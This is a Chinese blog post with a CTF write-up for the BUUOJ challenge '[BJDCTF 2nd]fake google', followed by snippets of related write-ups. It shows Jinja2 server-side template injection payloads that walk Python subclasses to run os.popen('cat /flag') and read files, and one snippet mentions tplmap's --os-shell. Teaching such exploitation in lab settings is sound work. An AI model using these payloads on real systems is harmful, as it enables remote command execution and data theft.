[BJDCTF 2nd]fake google

最新推荐文章于 2020-12-03 19:24:57 发布
最新推荐文章于 2020-12-03 19:24:57 发布
阅读量312 收藏 2
点赞数 1
分类专栏: CTF题目 # buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuller_Yan/article/details/106734823
版权

[BJDCTF 2nd]fake google

wp from Kuller_Yan

先打开靶机:

在这里插入图片描述
测试是否存在ssti注入{{1+1}}

在这里插入图片描述
进行查询{{''.__class__}}
在这里插入图片描述
next{{''.__class__.__bases__}}
在这里插入图片描述
next:{{''.__class__.__bases__[0].__subclasses__()}}
在这里插入图片描述
找到第169个{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
在这里插入图片描述

看大佬wp,还有其他的方式,这里搬运下:

或者找到os._wrap_close模块 117个
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('dir').read()}}  
当前文件夹
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}
来打开文件,payload有很多慢慢摸索慢慢积累= =


{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

fromhttps://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google

kuller_Yan
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]fake google 1
weixin_45674567的博客
04-22 510
参考文章https://blog.csdn.net/u011377996/article/details/86776181 确定模块注入: 具体网址内容: http://abcfb0f6-5bad-49f4-aadd-115d99530dba.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%...
json fake_useragent fake_useragent
06-24
fake_useragent json缓存 爬虫 fake 消息头
FakeApp2.2+core文件共1.4G
09-04
FakeApp2.2+core文件共1.4G
fake_google_login-master_login_html_login-master_fake_google_
10-01
Fake Google Login Webpage
fake_useragent.zip
08-27
python使用的fake_useragent.json
fakeapp2.1
11-19
fakeapp软件下载。链力链接地址。安装包1.8G
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
BUUCTF__[BJDCTF 2nd]fake google_题解
风过江南乱的博客
07-16 739
SSTI/沙盒逃逸详细总结 SSTI模板注入 服务端模板注入攻击
[BJDCTF 2nd]fake google Writeup(SSTI攻击原理分析)
StevenOnesir的博客
12-03 306
利用本题,我们开始讲解简单的SSTI知识。 首先进入题目界面,发现是一个大大的google搜索界面(仿制) 在搜索栏随意输入后,发现跳转到qaq,并以get方式传入了一个name的变量。 然后我们开始修改name变量的值。 不要因为我说要讲框架注入咱们就直接上SSTI的payload。。。正常测试找攻击点咱们也该试试1’ 之类的sql注入。。。 然后我们发现输入SSTI的表达式构造会出现回显: ?name={{2*2}} 这里附一张各类框架的结构图(网图): 漏洞形成的原因其实与sql等大同小异
[BJDCTF 2nd]fake google -wp
freerats的博客
06-29 220
打开后一个google搜索框,查看源码没什么,随便输入点东西搜索 查看源码,提示ssti 测试一下,存在ssti 1 、获取字符串的类对象 ''.__class__ 2 、寻找基类 ''.__class__.__mro__ 3 、寻找可用引用 ''.__class__.__mro__[1].__subclasses__() 在最后面发现模块引擎类型 <class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’
[BJDCTF 2nd] web题-fake google
BROTHERYY的博客
07-09 214
复现环境:buuoj.cn 根据提示知道是ssti模板注入,使用tplmap进行注入。 发现存在代码执行 tplmap在github上下载,好像只能用py2运行,我在py3运行会报错 查看flag flag{9d83b5bd-72fd-468e-93a6-90237a167245}
BUUCTF:[BJDCTF 2nd]fake google
末初的CSDN博客
11-08 391
https://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google 查看页面源代码 SSTI注入 Tplmap一把梭直接拿下 Tplmap项目地址:https://github.com/epinna/tplmap python2 .\tplmap.py -u "http://7917ad55-85e8-4fec-99db-55e2a05a3cd3.node3.buuoj.cn/qaq?name=mochu" 模板是Jinja2,直接--os-shel
Beware the Fake Google Chrome OS Download
CURSED!
10-31 417
Google recently announced that it is developing its own operating system based around the Chrome web browser, named appropriately enough Chrome OS . For the past week there have been rumors circulat...
【学习笔记2】buu [BJDCTF 2nd]fake google
weixin_43553654的博客
05-09 215
点进去一看什么都没有,在搜索栏随便敲了个1上去,搜索一下 查看源码<!--ssssssti & a little trick --> P3's girlfirend is : 1<br><hr>这提示简直不要更明显就是SSTI继续输入{{7*7}},发现给出了49的运算结果,怎么这么像我之前看到的flask模板注入呢。执行我之前搜集...
CTF之做题总结(二)
qq_45970607的博客
10-04 945
一、Crypto(密码学) 1、Railfence(栅栏密码) 我们先来看一下题目描述: 从题目Railfence(栅栏密码)和题目描述中我们能得到的信息是这道题是栅栏密码,然后题目描述里还提到了一个农妇在栅栏里喂5只小鸡,由此我们可以推测出这道栅栏密码的栏数应该是5,但是解密之后我们发现栏数设置为5不正确,然后试了试其它数字,发现都不是正确答案,在迷惑了好久之后,问了一下同学我才知道还有另一种形式的栅栏密码的存在:W型栅栏密码。知道了这道题是W型栅栏密码,于是在网上搜索了一下相关内容才大概了解了所谓的W
python Fake
最新发布
10-07
fake = Faker() 接下来,你可以使用Faker对象的各种属性(如name、address、ipv4_private)来生成相应类型的虚假数据。例如,要生成一个虚假的姓名和地址,你可以使用以下代码: name = fake.name() address = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值